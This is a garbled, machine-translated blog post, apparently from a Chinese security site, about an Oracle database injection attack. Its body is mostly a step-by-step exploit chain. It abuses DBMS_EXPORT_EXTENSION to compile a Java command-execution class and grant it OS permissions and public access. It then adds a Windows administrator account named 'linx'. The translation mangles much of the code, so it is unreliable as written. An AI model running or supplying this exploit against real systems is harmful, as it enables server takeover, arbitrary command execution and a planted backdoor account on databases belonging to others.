ORACLE injection code what I see

ORACLE injection Code recently, my friends found that their servers were handled by hackers, which also attracted my attention. Let's take a look at the special analysis records. After analysis, the cause of this vulnerability is caused by oracle ddl, but how to avoid this problem may not be completely solved from ORACLE, you need to implement business functions with developers. First, a good program code should not contain injection points, but the system running on the real platform should indeed eliminate the injection points and troubleshoot them, even if this problem is avoided from the ORACLE perspective, the injection points will also generate security for the operating system. This method is successfully tested in the WIN environment. LINUX is further studied, but the following is worth your attention! -Create a class www.2cto. comselect SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES ('foo', 'bar', 'dbms _ OUTPUT ". PUT (: P1); execute immediate "declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate" create or replace and compile java source named "LinxUtil" as import java. io. *; public class LinxUtil extends Object {public static String runCMD (String args) {try {BufferedReader myReader = new BufferedReader (New InputStreamReader (runtime.getruntime(cmd.exe c (args). getInputStream (); String stemp, str = ""; while (stemp = myReader. readLine ())! = Null) str + = stemp + "\ n"; myReader. close (); return str;} catch (Exception e) {return e. toString () ;}}" "; END;-', 'sys', 0, '1', 0) from dual; -Grant the Java permission to select SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES ('foo', 'bar', 'dbms _ OUTPUT ". PUT (: P1); execute immediate "declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate" begin dbms_java.grant_permission ("," SYS: java. io. filePermission "," <> "," execute "); end;"; END; -', 'sys', 0, '1', 0) from dual;-create the select SYS function. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES ('foo', 'bar', 'dbms _ OUTPUT ". PUT (: P1); execute immediate "declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate" create or replace function LinxRunCMD (p_cmd in varchar2) return varchar2 as language java name "LinxUtil. runCMD (java. lang. string) return String "; END;-', 'sys', 0, '1', 0) from dual; -Grant the public permission to execute the function select SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES ('foo', 'bar', 'dbms _ OUTPUT ". PUT (: P1); execute immediate "declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate" grant all on LinxRunCMD to public "; END;-', 'sy ', 0, '1', 0) from dual;-view select OBJECT_ID from all_objects where object_name = 'linxruncmd';-Add the user select sys. linxRunCMD ('COMMAND/c net user linx/add') from dual; select sys. linxRunCMD ('net localgroup administrators linx/add') from dual;